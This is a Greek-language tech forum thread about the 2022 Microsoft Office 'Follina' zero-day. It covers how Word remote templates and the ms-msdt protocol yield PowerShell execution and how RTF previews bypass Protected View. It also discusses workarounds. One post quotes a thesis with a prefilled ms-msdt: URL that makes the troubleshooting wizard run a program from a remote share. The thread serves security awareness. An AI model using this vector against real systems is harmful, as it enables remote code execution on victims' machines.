Αρκετοί ερευνητές, έχουν παρατηρήσει ένα νέο είδος επίθεσης, το οποίο παρακάμπτει την προστατευμένη προβολή της Microsoft και τις όποιες anti-malware δυνατότητες ανίχνευσης. Ο επιτιθέμενος, χρησιμοποιεί τη λειτουργία απομακρυσμένου προτύπου του Microsoft Word, για την ανάκτηση ενός αρχείου HTML από έναν απομακρυσμένο web-server. Στη συνέχεια, χρησιμοποιώντας το πρωτόκολλο ms-msdt, πετυχαίνει την εκτέλεση Power Shell.
Υπό κανονικές συνθήκες, τα αρχεία που προέρχονται από δυνητικά μη ασφαλείς τοποθεσίες, ανοίγουν μόνο για ανάγνωση ή σε προστατευμένη προβολή. Ωστόσο, στην περίπτωση αυτή, μπορεί εύκολα να παρακαμφθεί με την αλλαγή του εγγράφου σε αρχείο Rich Text Format (RTF). Με τον τρόπο αυτό, ο κώδικας, μπορεί να εκτελεστεί χωρίς να ανοίξει το έγγραφο, μέσω της καρτέλας προεπισκόπησης στην εξερεύνηση.
MalwareBytes
Έξτρα πηγές
https://doublepulsar.com/follina-a-m...y-1a47fce5629e
https://github.com/JohnHammond/msdt-follina
Εμφάνιση 1-13 από 13
-
31-05-22, 10:22 Microsoft Office zero-day “Follina” #1
- Εγγραφή
- 22-09-2003
- Μηνύματα
- 81.738
- Downloads
- 218
- Uploads
- 48
- Άρθρα
- 6
- Τύπος
- VDSL2
- Ταχύτητα
- 204800/20480
- ISP
- Wind
- Router
- Technicolor DGA4130
- SNR / Attn
- 6(dB) / 2.8(dB)
- Path Level
- Interleaved
-
31-05-22, 11:14 Απάντηση: Microsoft Office zero-day “Follina” #2
Άρα? ξηλώνουμε το preview στα email σαν λύση?
There's no substitute for experience
CorollaClub
-
31-05-22, 11:28 Re: Απάντηση: Microsoft Office zero-day “Follina” #3
Βγήκε workaround.
https://msrc-blog.microsoft.com/2022...vulnerability/Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..
Εθνικισμός και μετανάστες
Μία τάξη, φυλετικά διαχωρισμένη
-
31-05-22, 11:44 Απάντηση: Re: Απάντηση: Microsoft Office zero-day “Follina” #4There's no substitute for experience
CorollaClub
-
31-05-22, 18:47 Re: Απάντηση: Re: Απάντηση: Microsoft Office zero-day “Follina” #5Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..
Εθνικισμός και μετανάστες
Μία τάξη, φυλετικά διαχωρισμένη
-
31-05-22, 20:22 Απάντηση: Microsoft Office zero-day “Follina” #6
Δεν είναι η πρώτη φορά που βγαίνει exploit για τα διάφορα preview. Το οτι το preview αντιμετωπίζεται διαφορετικά απο το (read only) open ποτέ δεν μπόρεσα να το καταλάβω.
-
31-05-22, 20:26 Απάντηση: Microsoft Office zero-day “Follina” #7
-
31-05-22, 20:41 Απάντηση: Re: Απάντηση: Re: Απάντηση: Microsoft Office zero-day “Follina” #8There's no substitute for experience
CorollaClub
-
31-05-22, 20:45 Απάντηση: Re: Απάντηση: Microsoft Office zero-day “Follina” #9
-
31-05-22, 20:50 Re: Απάντηση: Microsoft Office zero-day “Follina” #10
Από αναφορές στο Twitter. Thesis 2 χρόνια πίσω
Σελίδα 29
In addition, even if file: and similar URLs are filtered out, the attacker can make use of the myriad of
other URI scheme handlers registered on modern systems. Vulnerabilities in those protocol handlers occur
from time to time [65]–[68] and sometimes the intended behaviour of those handlers can also be abused.
Three examples for Windows are given here but similar vectors likely also exist on other systems:
Windows includes the ms-msdt: protocol that opens the Microsoft Support Diagnostic Tool which
provides the troubleshooting wizard to diagnose Wi-Fi and audio problems and the like [69]. This
protocol directly passes the string it is given to the msdt.exe program. The attacker now needs to
find an included wizard that allows the execution of arbitrary programs, preferably even remote ones.
The program compatibility wizard fits this description. Luckily for the attacker, all user input can
also be prefilled from the command line, leading to this URL:Κώδικας:ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\live.sysinternals.com\tools\procmon.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO
Για αυτό μιλά και για back up.Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..
Εθνικισμός και μετανάστες
Μία τάξη, φυλετικά διαχωρισμένη
-
31-05-22, 20:54 Απάντηση: Re: Απάντηση: Microsoft Office zero-day “Follina” #11
-
31-05-22, 22:56 Απάντηση: Microsoft Office zero-day “Follina” #12
Δεν κατάλαβες τι έγραψα. Τι σημασία έχει αν γίνονται απο διαφορετικά κομμάτια; Δεν ψάχνω να βρω τον υπεύθυνο να του ζητήσω το λόγο. Λέω οτι όποιος φτιάχνει preview πρέπει να το κάνει με την ίδια προσοχή στην ασφάλεια με αυτόν που φτιάχνει open. Φαίνεται οτι αρκετές φορές αυτό δεν συμβαίνει.
-
31-05-22, 23:36 Απάντηση: Microsoft Office zero-day “Follina” #13
Bookmarks